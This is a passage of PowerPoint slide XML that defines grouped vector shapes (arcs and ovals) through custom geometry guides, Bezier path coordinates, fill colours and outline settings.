                    <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                    <a:gd name="T5" fmla="*/ 21530 h 41421"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="41421" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="13179" y="41421"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5190" y="38039"/>
                        <a:pt x="0" y="30205"/>
                        <a:pt x="0" y="21530"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="10275"/>
                        <a:pt x="8641" y="906"/>
                        <a:pt x="19860" y="0"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="21600" h="41421" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="13179" y="41421"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5190" y="38039"/>
                        <a:pt x="0" y="30205"/>
                        <a:pt x="0" y="21530"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0"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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66737" name="Arc 1201">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8A4029A-4CB0-AF4C-9BBD-C90F7ABB6936}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="849" y="2048"/>
                  <a:ext cx="42" cy="12"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21006 0 0"/>
                    <a:gd name="G1" fmla="+- 0 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 39208 w 39208"/>
                    <a:gd name="T1" fmla="*/ 11629 h 21600"/>
                    <a:gd name="T2" fmla="*/ 0 w 39208"/>
                    <a:gd name="T3" fmla="*/ 5033 h 21600"/>
                    <a:gd name="T4" fmla="*/ 21006 w 39208"/>
                    <a:gd name="T5" fmla="*/ 0 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="39208" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="39208" y="11629"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="35239" y="17840"/>
                        <a:pt x="28377" y="21600"/>
                        <a:pt x="21006" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11015" y="21600"/>
                        <a:pt x="2328" y="14748"/>
                        <a:pt x="0" y="5032"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="39208" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="39208" y="11629"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="35239" y="17840"/>
                        <a:pt x="28377" y="21600"/>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8" name="Arc 1202">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A154A7-D8B8-8A42-A219-25699E1977D6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="850" y="2048"/>
                  <a:ext cx="40" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 20955 0 0"/>
                    <a:gd name="G1" fmla="+- 0 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 38927 w 38927"/>
                    <a:gd name="T1" fmla="*/ 11982 h 21600"/>
                    <a:gd name="T2" fmla="*/ 0 w 38927"/>
                    <a:gd name="T3" fmla="*/ 5239 h 21600"/>
                    <a:gd name="T4" fmla="*/ 20955 w 38927"/>
                    <a:gd name="T5" fmla="*/ 0 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="38927" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="38926" y="11981"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="34920" y="17990"/>
                        <a:pt x="28176" y="21600"/>
                        <a:pt x="20955" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11043" y="21600"/>
                        <a:pt x="2403" y="14854"/>
                        <a:pt x="-1" y="5239"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="38927" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="38926" y="11981"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="34920" y="17990"/>
                        <a:pt x="28176" y="21600"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="66739" name="Group 1203">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED6C03B5-C01D-6C4C-BD23-181E7462B4D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2058527" y="2343573"/>
            <a:ext cx="1178917" cy="804959"/>
            <a:chOff x="1372" y="240"/>
            <a:chExt cx="836" cy="549"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="66740" name="Group 1204">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33809643-A657-004B-A95B-45A3CB01E41A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1372" y="240"/>
              <a:ext cx="833" cy="499"/>
              <a:chOff x="628" y="1878"/>
              <a:chExt cx="833" cy="499"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66741" name="Oval 1205">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A3336F1-6307-A848-A38A-5D91F4011710}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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2" name="Oval 1206">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD112789-35F1-8847-8336-A7826461D2EE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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3" name="Oval 1207">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC60DE48-73BC-8243-9036-7EDE78F2CF37}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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4" name="Oval 1208">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{525800F3-5458-C84F-914A-3B5CF6F18328}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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5" name="Oval 1209">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B331066-102C-6847-A38C-D11405212D3F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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6" name="Oval 1210">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E118C542-913F-394A-AD98-A2919422AA92}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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7" name="Oval 1211">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B48F41FE-E4CF-144F-970F-141CAEA1C1F9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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8" name="Oval 1212">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DCAE9E2-F3FE-184A-912E-A1A82A156487}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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9" name="Oval 1213">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B2B2BF5-F710-1B40-B79A-4D1C41514A7D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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750" name="Group 1214">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8049CC8D-5431-1640-BD55-DCC3D45B7614}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1372" y="286"/>
              <a:ext cx="836" cy="503"/>
              <a:chOff x="628" y="1876"/>
              <a:chExt cx="836" cy="503"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66751" name="Arc 1215">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDADDDCC-DF0C-754B-867E-4C49F19EB3E2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="921" y="1876"/>
                <a:ext cx="346" cy="104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 20557 0 0"/>
                  <a:gd name="G1" fmla="+- 21600 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 0 w 40736"/>
                  <a:gd name="T1" fmla="*/ 14968 h 21600"/>
                  <a:gd name="T2" fmla="*/ 40736 w 40736"/>
                  <a:gd name="T3" fmla="*/ 13896 h 21600"/>
                  <a:gd name="T4" fmla="*/ 20557 w 40736"/>
                  <a:gd name="T5" fmla="*/ 21600 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="40736" h="21600" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="0" y="14968"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2878" y="6046"/>
                      <a:pt x="11182" y="0"/>
                      <a:pt x="20557" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29513" y="0"/>
                      <a:pt x="37541" y="5528"/>
                      <a:pt x="40736" y="13895"/>
                    </a:cubicBezTo>
                  </a:path>
                  <a:path w="40736" h="21600" stroke="0" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="0" y="14968"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2878" y="6046"/>
                      <a:pt x="11182" y="0"/>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2" name="Arc 1216">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBF9F58F-E4DD-EC43-9ACC-B4B85F9C21B6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="923" y="1878"/>
                <a:ext cx="342" cy="102"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 20540 0 0"/>
                  <a:gd name="G1" fmla="+- 21600 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 0 w 40698"/>
                  <a:gd name="T1" fmla="*/ 14917 h 21600"/>
                  <a:gd name="T2" fmla="*/ 40698 w 40698"/>
                  <a:gd name="T3" fmla="*/ 13839 h 21600"/>
                  <a:gd name="T4" fmla="*/ 20540 w 40698"/>
                  <a:gd name="T5" fmla="*/ 21600 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="40698" h="21600" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="-1" y="14916"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2894" y="6021"/>
                      <a:pt x="11185" y="0"/>
                      <a:pt x="20540" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29474" y="0"/>
                      <a:pt x="37487" y="5501"/>
                      <a:pt x="40697" y="13839"/>
                    </a:cubicBezTo>
                  </a:path>
                  <a:path w="40698" h="21600" stroke="0" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="-1" y="14916"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2894" y="6021"/>
                      <a:pt x="11185" y="0"/>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sz="1797" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66753" name="Arc 1217">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7BFF08F-B2D6-3B40-BBC3-257A6EDFDFD6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="713" y="1930"/>
                <a:ext cx="214" cy="126"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 21600 0 0"/>
                  <a:gd name="G1" fmla="+- 21600 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 442 w 32990"/>
                  <a:gd name="T1" fmla="*/ 25945 h 25945"/>
                  <a:gd name="T2" fmla="*/ 32990 w 32990"/>
                  <a:gd name="T3" fmla="*/ 3247 h 25945"/>
                  <a:gd name="T4" fmla="*/ 21600 w 32990"/>
                  <a:gd name="T5" fmla="*/ 21600 h 25945"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="32990" h="25945" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="441" y="25945"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="147" y="24515"/>
                      <a:pt x="0" y="23059"/>
                      <a:pt x="0" y="21600"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="9670"/>
                      <a:pt x="9670" y="0"/>
                      <a:pt x="21600" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25625" y="0"/>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0"/>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4" name="Arc 1218">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B7DEF06-045A-2640-BB1B-14D3BA14BFDE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="715" y="1932"/>
                <a:ext cx="211" cy="123"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 21600 0 0"/>
                  <a:gd name="G1" fmla="+- 21600 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 446 w 32950"/>
                  <a:gd name="T1" fmla="*/ 25966 h 25966"/>
                  <a:gd name="T2" fmla="*/ 32950 w 32950"/>
                  <a:gd name="T3" fmla="*/ 3222 h 25966"/>
                  <a:gd name="T4" fmla="*/ 21600 w 32950"/>
                  <a:gd name="T5" fmla="*/ 21600 h 25966"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="32950" h="25966" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="445" y="25966"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="149" y="24529"/>
                      <a:pt x="0" y="23066"/>
                      <a:pt x="0" y="21600"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="9670"/>
                      <a:pt x="9670" y="0"/>
                      <a:pt x="21600" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25608" y="0"/>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0"/>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sz="1797" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66755" name="Arc 1219">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA326022-7424-3848-AB27-C05661729D92}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="682" y="2217"/>
                <a:ext cx="216" cy="99"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 21600 0 0"/>
                  <a:gd name="G1" fmla="+- 917 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 32074 w 32074"/>
                  <a:gd name="T1" fmla="*/ 19808 h 22517"/>
                  <a:gd name="T2" fmla="*/ 19 w 32074"/>
                  <a:gd name="T3" fmla="*/ 0 h 22517"/>
                  <a:gd name="T4" fmla="*/ 21600 w 32074"/>
                  <a:gd name="T5" fmla="*/ 917 h 22517"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="32074" h="22517" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="32073" y="19807"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="28868" y="21584"/>
                      <a:pt x="25264" y="22517"/>
                      <a:pt x="21600" y="22517"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9670" y="22517"/>
                      <a:pt x="0" y="12846"/>
                      <a:pt x="0" y="917"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="611"/>
                      <a:pt x="6" y="305"/>
                      <a:pt x="19" y="0"/>
                    </a:cubicBezTo>
                  </a:path>
                  <a:path w="32074" h="22517" stroke="0" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="32073" y="19807"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="28868" y="21584"/>
                      <a:pt x="25264" y="22517"/>
                      <a:pt x="21600" y="22517"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9670" y="22517"/>
                      <a:pt x="0" y="12846"/>
                      <a:pt x="0" y="917"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="611"/>
                      <a:pt x="6" y="305"/>
                      <a:pt x="19" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="21600" y="9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6" name="Arc 1220">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BE7B3B9-6A21-304E-9A32-809BD0B1B429}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="684" y="2217"/>
                <a:ext cx="213" cy="96"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 21600 0 0"/>
                  <a:gd name="G1" fmla="+- 924 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 32013 w 32013"/>
                  <a:gd name="T1" fmla="*/ 19848 h 22524"/>
                  <a:gd name="T2" fmla="*/ 20 w 32013"/>
                  <a:gd name="T3" fmla="*/ 0 h 22524"/>
                  <a:gd name="T4" fmla="*/ 21600 w 32013"/>
                  <a:gd name="T5" fmla="*/ 924 h 22524"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="32013" h="22524" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="32013" y="19848"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="28823" y="21603"/>
                      <a:pt x="25241" y="22524"/>
                      <a:pt x="21600" y="22524"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9670" y="22524"/>
                      <a:pt x="0" y="12853"/>
                      <a:pt x="0" y="924"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="615"/>
                      <a:pt x="6" y="307"/>
                      <a:pt x="19" y="-1"/>
                    </a:cubicBezTo>
                  </a:path>
                  <a:path w="32013" h="22524" stroke="0" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="32013" y="19848"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="28823" y="21603"/>
                      <a:pt x="25241" y="22524"/>
                      <a:pt x="21600" y="22524"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9670" y="22524"/>
                      <a:pt x="0" y="12853"/>
                      <a:pt x="0" y="924"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="615"/>
                      <a:pt x="6" y="307"/>
                      <a:pt x="19" y="-1"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="21600" y="924"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="E7EDED"/>
              </a:solidFill>
              <a:ln w="6350">
                <a:solidFill>
                  <a:srgbClr val="6C8F93"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" sz="1797" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66757" name="Arc 1221">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D0DB376-73FF-6444-9EF4-32E6B0627F73}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1262" y="1936"/>
                <a:ext cx="164" cy="120"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 4477 0 0"/>
                  <a:gd name="G1" fmla="+- 21600 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 0 w 26077"/>
                  <a:gd name="T1" fmla="*/ 469 h 32051"/>
                  <a:gd name="T2" fmla="*/ 23380 w 26077"/>
                  <a:gd name="T3" fmla="*/ 32051 h 32051"/>
                  <a:gd name="T4" fmla="*/ 4477 w 26077"/>
                  <a:gd name="T5" fmla="*/ 21600 h 32051"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="26077" h="32051" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="0" y="469"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1471" y="157"/>
